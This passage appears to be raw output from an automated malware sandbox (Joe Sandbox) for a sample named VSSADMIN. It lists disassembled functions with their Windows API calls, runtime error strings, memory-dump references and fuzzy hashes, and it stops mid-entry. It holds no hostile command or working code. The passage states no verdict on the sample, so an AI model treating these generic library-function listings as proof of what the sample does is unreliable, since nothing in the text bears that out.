                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF614C92463,?,?,?,00007FF614C8CBBC,?,?,00000000,00007FF614C83A8F,?,?,?,00007FF614C89343), ref: 00007FF614C8A6D3
                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF614C92463,?,?,?,00007FF614C8CBBC,?,?,00000000,00007FF614C83A8F,?,?,?,00007FF614C89343), ref: 00007FF614C8A6E4
                                                                                                                                                                      • SetLastError.KERNEL32(?,?,?,00007FF614C92463,?,?,?,00007FF614C8CBBC,?,?,00000000,00007FF614C83A8F,?,?,?,00007FF614C89343), ref: 00007FF614C8A6FF
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Value$ErrorLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2506987500-0
                                                                                                                                                                      • Opcode ID: 3efd373c14d2905db5cf458f2f6b2ad3e7cf37933da3a5fec4fc665eb1109d59
                                                                                                                                                                      • Instruction ID: 0c761902a80d3848f273854b2926a9bb2ad5779016771e9b17685e10aa081245
                                                                                                                                                                      • Opcode Fuzzy Hash: 3efd373c14d2905db5cf458f2f6b2ad3e7cf37933da3a5fec4fc665eb1109d59
                                                                                                                                                                      • Instruction Fuzzy Hash: 10218B24B0CE4342FA58672996C517A62725F4AFB4F180737E93EC77DAEE2DB441A700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C9709C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                      • String ID: CONOUT$
                                                                                                                                                                      • API String ID: 3230265001-3130406586
                                                                                                                                                                      • Opcode ID: 8e0e590b76c227ed4e0945dd3cc989df51f43b4687c0318c0d05d3449c58233d
                                                                                                                                                                      • Instruction ID: 342ce6e1e1fb8e72f295e9ca9060615c825662d53de512ff67ff20a91df6bdd1
                                                                                                                                                                      • Opcode Fuzzy Hash: 8e0e590b76c227ed4e0945dd3cc989df51f43b4687c0318c0d05d3449c58233d
                                                                                                                                                                      • Instruction Fuzzy Hash: F7119025B18E8286E7508B56F89432972B0FB89FF8F540236EA5EC77A4DF3ED5148740
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C8A7C8 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF614C8447D,?,?,?,?,00007FF614C8DDD7,?,?,00000000,00007FF614C8A8E6,?,?,?), ref: 00007FF614C8A7D7
                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF614C8447D,?,?,?,?,00007FF614C8DDD7,?,?,00000000,00007FF614C8A8E6,?,?,?), ref: 00007FF614C8A80D
                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF614C8447D,?,?,?,?,00007FF614C8DDD7,?,?,00000000,00007FF614C8A8E6,?,?,?), ref: 00007FF614C8A83A
                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF614C8447D,?,?,?,?,00007FF614C8DDD7,?,?,00000000,00007FF614C8A8E6,?,?,?), ref: 00007FF614C8A84B
                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF614C8447D,?,?,?,?,00007FF614C8DDD7,?,?,00000000,00007FF614C8A8E6,?,?,?), ref: 00007FF614C8A85C
                                                                                                                                                                      • SetLastError.KERNEL32(?,?,?,00007FF614C8447D,?,?,?,?,00007FF614C8DDD7,?,?,00000000,00007FF614C8A8E6,?,?,?), ref: 00007FF614C8A877
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Value$ErrorLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2506987500-0
                                                                                                                                                                      • Opcode ID: 4c52bc5e5372e865c4a3c685b4a960aeb42bb1f19d5b270cb680a2a9eed32c38
                                                                                                                                                                      • Instruction ID: 6c5ca6c08872f62a718d612997aa6df4b715a143c14ce02ef574d144d6167ecd
                                                                                                                                                                      • Opcode Fuzzy Hash: 4c52bc5e5372e865c4a3c685b4a960aeb42bb1f19d5b270cb680a2a9eed32c38
                                                                                                                                                                      • Instruction Fuzzy Hash: BF118E24F0CE4742FA18572996C517A21729F47FB0F144336E92EC77D6EE2DE4026710
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C7C8D8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                      • String ID: csm$f
                                                                                                                                                                      • API String ID: 2395640692-629598281
                                                                                                                                                                      • Opcode ID: 1a83892880e5095dfe2d0dec5f3e9b6bb990bdc28557877ea76d50c18ddc7099
                                                                                                                                                                      • Instruction ID: a248c42de3bc9d8e642e4a5ab875f693969a78506d1565703df18c64de22cdf8
                                                                                                                                                                      • Opcode Fuzzy Hash: 1a83892880e5095dfe2d0dec5f3e9b6bb990bdc28557877ea76d50c18ddc7099
                                                                                                                                                                      • Instruction Fuzzy Hash: 9D519132A1DA0387E754CF15E484A2D37A5FB46FAAF508132DA4A87748EF38E941C704
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFD3FBF158C Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 131COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245453028.00007FFD3FBF1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBF0000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245445748.00007FFD3FBF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FBFD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC55000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC69000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC79000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FC8D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE3D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE3F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE6A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FE9C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FEC1000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF0F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF15000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF17000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF34000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245453028.00007FFD3FF41000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245636932.00007FFD3FF45000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245643822.00007FFD3FF47000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffd3fbf0000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: 00007D592F1170
                                                                                                                                                                      • String ID: ..\s\crypto\x509v3\v3_utl.c$E$FALSE$TRUE
                                                                                                                                                                      • API String ID: 4247867426-1433594941
                                                                                                                                                                      • Opcode ID: 75eb748e2660e600ced4d7ef43fabb5a78271367a70e407096b100b27adb93a7
                                                                                                                                                                      • Instruction ID: d92c331b49368be01ec65b94e02ddf5944eaddbb71b4c44c2f44656b7d98ac8e
                                                                                                                                                                      • Opcode Fuzzy Hash: 75eb748e2660e600ced4d7ef43fabb5a78271367a70e407096b100b27adb93a7
                                                                                                                                                                      • Instruction Fuzzy Hash: EB51CE62F0A74A94FA2CDB52D4247B923A0AF85780F84443ADF4D27789DF7EE941E301
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C72240 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                      • String ID: Unhandled exception in script
                                                                                                                                                                      • API String ID: 3081866767-2699770090
                                                                                                                                                                      • Opcode ID: 974deba25f7d704b68bc438d35764f22adf165380188aa8b9be72cc7fdee2770
                                                                                                                                                                      • Instruction ID: 8d5ede278d034fde43ca452e616bc6d53117661fb95187da014c9fb4eb46146e
                                                                                                                                                                      • Opcode Fuzzy Hash: 974deba25f7d704b68bc438d35764f22adf165380188aa8b9be72cc7fdee2770
                                                                                                                                                                      • Instruction Fuzzy Hash: F031427260CA8299EB24DF65E8951F96370FF8AB94F400136EA4D8BB56DF3DD145C700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C72620 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetLastError.KERNEL32(00000000,00000000,00000000,00007FF614C77774,?,?,?,?,?,?,?,?,?,?,?,00007FF614C7101D), ref: 00007FF614C72654
                                                                                                                                                                        • Part of subcall function 00007FF614C774E0: GetLastError.KERNEL32(00000000,00007FF614C7269E,?,?,?,?,?,?,?,?,?,?,?,00007FF614C7101D), ref: 00007FF614C77507
                                                                                                                                                                        • Part of subcall function 00007FF614C774E0: FormatMessageW.KERNEL32 ref: 00007FF614C77536
                                                                                                                                                                        • Part of subcall function 00007FF614C77A60: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF614C726FB), ref: 00007FF614C77A9A
                                                                                                                                                                      • MessageBoxW.USER32 ref: 00007FF614C72730
                                                                                                                                                                      • MessageBoxA.USER32 ref: 00007FF614C7274C
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Message$ErrorLast$ByteCharFormatMultiWide
                                                                                                                                                                      • String ID: %s%s: %s$Fatal error detected
                                                                                                                                                                      • API String ID: 2806210788-2410924014
                                                                                                                                                                      • Opcode ID: 7890d9f144e33e33d69a38586b169397518973d2a5b1a440a20cff3164d3e9e8
                                                                                                                                                                      • Instruction ID: a14333e64394f4d7aec91c6de1b8a0ec33d43a700be5e5ed5aafd33a599e2923
                                                                                                                                                                      • Opcode Fuzzy Hash: 7890d9f144e33e33d69a38586b169397518973d2a5b1a440a20cff3164d3e9e8
                                                                                                                                                                      • Instruction Fuzzy Hash: C131647262CEC292EA309B14E4916EA6374FF85B94F405037E68D83A59DF3DD745CB40
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C88910 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                                                      • Opcode ID: 1edae9836d644cf3f37344bb8067f5d3e72c30a74e7bf89e7e9475504bb25611
                                                                                                                                                                      • Instruction ID: e52832263dd51c3d50f8a8cb14844fbee443b16ab54c14f4669ffdd6260e5c8f
                                                                                                                                                                      • Opcode Fuzzy Hash: 1edae9836d644cf3f37344bb8067f5d3e72c30a74e7bf89e7e9475504bb25611
                                                                                                                                                                      • Instruction Fuzzy Hash: 57F04F65A19E4291EF108B24E48533A5330AF86FB5F540637D56E87AF4DF2ED548C310
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C987D4 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _set_statfp
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1156100317-0
                                                                                                                                                                      • Opcode ID: 69d38c35bd33e64192705e47d806ebaffe6519085bb8d16871af39b095092657
                                                                                                                                                                      • Instruction ID: df903f3215afb40246e66390c7a8782672b61de48a1f20f8636c4cf7020c10d8
                                                                                                                                                                      • Opcode Fuzzy Hash: 69d38c35bd33e64192705e47d806ebaffe6519085bb8d16871af39b095092657
                                                                                                                                                                      • Instruction Fuzzy Hash: 87119122E38E03E5F6541564D4C237720616F57BFCF140A36EA7E876EACE3EA8418138
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C8A890 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • FlsGetValue.KERNEL32(?,?,?,00007FF614C89AA3,?,?,00000000,00007FF614C89D3E,?,?,?,?,?,00007FF614C8221C), ref: 00007FF614C8A8AF
                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF614C89AA3,?,?,00000000,00007FF614C89D3E,?,?,?,?,?,00007FF614C8221C), ref: 00007FF614C8A8CE
                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF614C89AA3,?,?,00000000,00007FF614C89D3E,?,?,?,?,?,00007FF614C8221C), ref: 00007FF614C8A8F6
                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF614C89AA3,?,?,00000000,00007FF614C89D3E,?,?,?,?,?,00007FF614C8221C), ref: 00007FF614C8A907
                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF614C89AA3,?,?,00000000,00007FF614C89D3E,?,?,?,?,?,00007FF614C8221C), ref: 00007FF614C8A918
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Value
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3702945584-0
                                                                                                                                                                      • Opcode ID: 641b5c1756b5a7a370e8acee299cebcfbeece5c9431c4ccb462b483a43e8f849
                                                                                                                                                                      • Instruction ID: cb55e11e228a2a7467eeab2d25f24b4dd5abe3b95e3ad79e3ee219c0287d43cd
                                                                                                                                                                      • Opcode Fuzzy Hash: 641b5c1756b5a7a370e8acee299cebcfbeece5c9431c4ccb462b483a43e8f849
                                                                                                                                                                      • Instruction Fuzzy Hash: 02113A24F0CE4342FA58936AA5C11BA61725F46FB0F585336E93EC77D6EE2DA442A700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C8A724 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00007FF614C92463,?,?,?,00007FF614C8CBBC,?,?,00000000,00007FF614C83A8F), ref: 00007FF614C8A735
                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF614C92463,?,?,?,00007FF614C8CBBC,?,?,00000000,00007FF614C83A8F), ref: 00007FF614C8A754
                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF614C92463,?,?,?,00007FF614C8CBBC,?,?,00000000,00007FF614C83A8F), ref: 00007FF614C8A77C
                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF614C92463,?,?,?,00007FF614C8CBBC,?,?,00000000,00007FF614C83A8F), ref: 00007FF614C8A78D
                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF614C92463,?,?,?,00007FF614C8CBBC,?,?,00000000,00007FF614C83A8F), ref: 00007FF614C8A79E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.245393583.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.245381374.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245405703.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245414216.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.245438214.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Value
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3702945584-0
                                                                                                                                                                      • Opcode ID: f69b442354946db37e634020f35520dac2635bfc442cf553b2ea1a5b1da725dd
                                                                                                                                                                      • Instruction ID: 0194e0d27ffd21c3f8c13ecddd487f401db385377c681af90af8ba56de308296
                                                                                                                                                                      • Opcode Fuzzy Hash: f69b442354946db37e634020f35520dac2635bfc442cf553b2ea1a5b1da725dd
                                                                                                                                                                      • Instruction Fuzzy Hash: 6C11B728A0DE0342F958A63958D55BA21B24F47F74F180736E93ECB2D3ED2DB442B751
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C8F1C8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
